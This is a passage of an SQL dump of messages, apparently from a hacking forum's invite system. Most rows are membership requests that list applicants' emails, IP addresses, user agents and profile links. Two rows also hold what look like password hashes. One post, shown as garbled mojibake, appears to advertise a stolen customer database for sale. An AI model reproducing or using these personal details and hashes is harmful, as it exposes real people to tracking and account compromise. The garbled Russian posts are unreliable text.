from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 76.187.57.251\n[*][b]real ip[/b]: 76.187.57.251\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.tf2outpost.com/user/76561198028613297 | http://www.tf2outpost.com/user/76561198028613297 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1540, 1396, 0, 'Invite', 2, '{$name}', 1407805119, '[SIZE=\'4\'][COLOR=\'Sienna\']oaz228[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: asdasd@sads.ss\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1541, 1397, 0, 'Invite', 2, '{$name}', 1407805702, '[SIZE=\'4\'][COLOR=\'Sienna\']ozon671[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: asdasda@asaa.aa\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ozon671.chatium.com | ozon671.chatium.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1542, 1398, 0, 'Invite', 2, '{$name}', 1407806153, '[SIZE=\'4\'][COLOR=\'Sienna\']omon[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: sdjn@smnd.ss\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 195.154.243.53\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://d3.ru/user/omon-dey | http://d3.ru/user/omon-dey \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1543, 1399, 0, 'Invite', 2, '{$name}', 1407807031, '[SIZE=\'4\'][COLOR=\'Sienna\']namaz228[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: asdasd@sss.ss\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: 5.228.94.73\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1544, 1400, 0, 'Invite', 2, '{$name}', 1407811373, '[SIZE=\'4\'][COLOR=\'Sienna\']Amiral[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: th3amiral@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 94.242.246.24\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://amiral.by | amiral.by \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1545, 1401, 0, 'Invite', 2, '{$name}', 1407813123, '[SIZE=\'4\'][COLOR=\'Sienna\']oaz_tester[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: oaz@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1547, 1403, 0, 'Invite', 2, '{$name}', 1407829585, '[SIZE=\'4\'][COLOR=\'Sienna\']TheBuffer[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: holymoly11111@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.104.224.15\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/bufferdance | http://vk.com/bufferdance \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1548, 1404, 0, 'Invite', 2, '{$name}', 1407831057, '[SIZE=\'4\'][COLOR=\'Sienna\']testuser[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: TEST@TEST.RU\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : testuser : michael_srv@mail.ru : : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/TestUser?src=hash | https://twitter.com/hashtag/TestUser?src=hash \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1549, 1134, 1223, 'w0rm', 1, '', 1407831397, 'тõÿõрь òÑÂõ ÷ðÑÂòúø þñрðñðтыòðютÑÂѠðòтþüðтøчõÑÂúø, ø õÑÂûø ÷ðÑÂòøтõûь ýõ ÑÂþÑÂтþøт ò чõрýых ñð÷ðх тþ õüу òыòþôøтÑÂѠфþрüð þÿûðты ø ðòтðüðтøчõÑÂúø óõýõрøруõтÑÂѠûþóøý ø ÿðрþûь.\nò ÿрþтøòýþü ÑÂûучðõ ñûþúøруõтÑÂÑÂ.', 1, 0, '', 0, 1, 0, 0, 0), (1551, 1405, 0, 'mb1', 25, '×ðúð÷ы', 1407831668, 'ØýтõрõÑÂуõт ñô (øüÑÂ,ýþüõр) [url]www.letoile.ru[/url] Ñюôöõт 40ú руñûõù\r\nßøÑÂðть [email]mb@exploit.im[/email]', 1, 0, '', 4, 1, 0, 0, 0), (1553, 1406, 0, 'Invite', 2, '{$name}', 1407834928, '[SIZE=\'4\'][COLOR=\'Sienna\']Andrewa[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: andrewaeva@ya.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 80.70.234.113\n[*][b]real ip[/b]: 80.70.234.113\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://andrewa.ru | andrewa.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1554, 1407, 0, 'Invite', 2, '{$name}', 1407838102, '[SIZE=\'4\'][COLOR=\'Sienna\']Asterea[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: asterea@exploit.im\n[b]e-mail[/b]: habbojefrey@hotmail.com\n[b]Info[/b]: hello, im asterea\r\ni know some cool stuff like malware analysing and security researching, broad hacking knowledge and shit. let me join thx \r\n\r\ntwitter @4sterea\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 212.224.187.165\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://asterea.minus.com | asterea.minus.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1556, 1408, 0, 'Invite', 2, '{$name}', 1407847712, '[SIZE=\'4\'][COLOR=\'Sienna\']Kalishnki[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 20309232\n[b]e-mail[/b]: awd0dw@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://411bonanza.blogspot.com/.../game-with-fame-kinda.html | http://411bonanza.blogspot.com/.../game-with-fame-kinda.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1557, 1409, 0, 'Invite', 2, '{$name}', 1407847742, '[SIZE=\'4\'][COLOR=\'Sienna\']Kalishnki[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 20309232\n[b]e-mail[/b]: awd0dw@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://411bonanza.blogspot.com/.../game-with-fame-kinda.html | http://411bonanza.blogspot.com/.../game-with-fame-kinda.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1558, 1410, 0, 'Invite', 2, '{$name}', 1407847771, '[SIZE=\'4\'][COLOR=\'Sienna\']Kalishnki[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 20309232\n[b]e-mail[/b]: awd0dw@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://411bonanza.blogspot.com/.../game-with-fame-kinda.html | http://411bonanza.blogspot.com/.../game-with-fame-kinda.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1559, 1411, 0, 'Invite', 2, '{$name}', 1407848057, '[SIZE=\'4\'][COLOR=\'Sienna\']RXFutr[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: rxfutr@jabbim.com\n[b]e-mail[/b]: rxfutr@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 85.105.178.242\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1560, 1412, 0, 'Invite', 2, '{$name}', 1407848814, '[SIZE=\'4\'][COLOR=\'Sienna\']pentester875[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ...\n[b]e-mail[/b]: monikazxc@prokonto.pl\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.95.144.145\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:29.0) Gecko/20100101 Firefox/29.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1561, 1413, 0, 'Invite', 2, '{$name}', 1407848877, '[SIZE=\'4\'][COLOR=\'Sienna\']Crypto[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: goodlife@jabbim.com\n[b]e-mail[/b]: goodlife@jabbim.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 85.105.178.242\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Crypto : win2003@list.ru : : a259db0798e7517cdc76dcd3be480935\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://crypto.stackexchange.com | crypto.stackexchange.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1562, 1414, 0, 'Invite', 2, '{$name}', 1407860687, '[SIZE=\'4\'][COLOR=\'Sienna\']kapr[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 661615739\n[b]e-mail[/b]: pkarepin@bk.ru\n[b]Info[/b]: Приветствую! Разбираюсь в клиент-серверных уязвимостях, больше в серверных(sqlinj, phpinj(lfi/fri), повышение привелегий etc). Пишу на php, python.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request 